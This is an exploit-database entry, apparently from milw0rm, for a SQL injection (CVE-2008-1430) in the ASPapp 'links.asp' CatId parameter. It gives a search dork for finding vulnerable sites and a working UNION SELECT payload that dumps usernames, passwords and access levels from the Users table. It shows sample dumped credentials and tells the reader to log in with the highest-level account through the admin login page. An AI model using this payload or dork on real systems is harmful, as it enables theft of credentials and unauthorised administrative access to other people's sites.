ASPapp Knowledge Base - 'CatId' SQL Injection (1)

Author: xcorpitx
type: webapps
platform: asp
port: 
date_added: 2008-03-18 
date_updated: 2016-11-16 
verified: 1 
codes: OSVDB-43842;CVE-2008-1430;OSVDB-43823 
tags: 
aliases:  
screenshot_url:  
application_url:

..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##

-----------------Turkey--------------------------------------

--------- www.Hayalet-hack.com-------------------------------

----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
-------------------------------------------------
 you ll see lots of users like this but  accesslevel ll help you for see admin
-------------------------------------------------------------
----------------example--------------------------------------

Links â€º guest  â€º  12    â€º 1     user
Links â€º editor â€º editor â€º 2     materator
Links â€º managerâ€º managerâ€º 2     materator
Links â€º surco  â€º surco  â€º 2     materator
Links â€º admin  â€º admin  â€º 3     admin
Links â€º ovivas â€º ovivas â€º 4     super-admin----- we  ll login with this username
-------------------------------------------------------------

-------------------------------------------------------------
i mean.. when you see  big number  4 or 5  you can  use this username and password
-------------------------------------------------------------

-------
dork   -  ''links.asp?CatId''
-------
exploit-
-------
admin login-
-------
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# milw0rm.com [2008-03-19]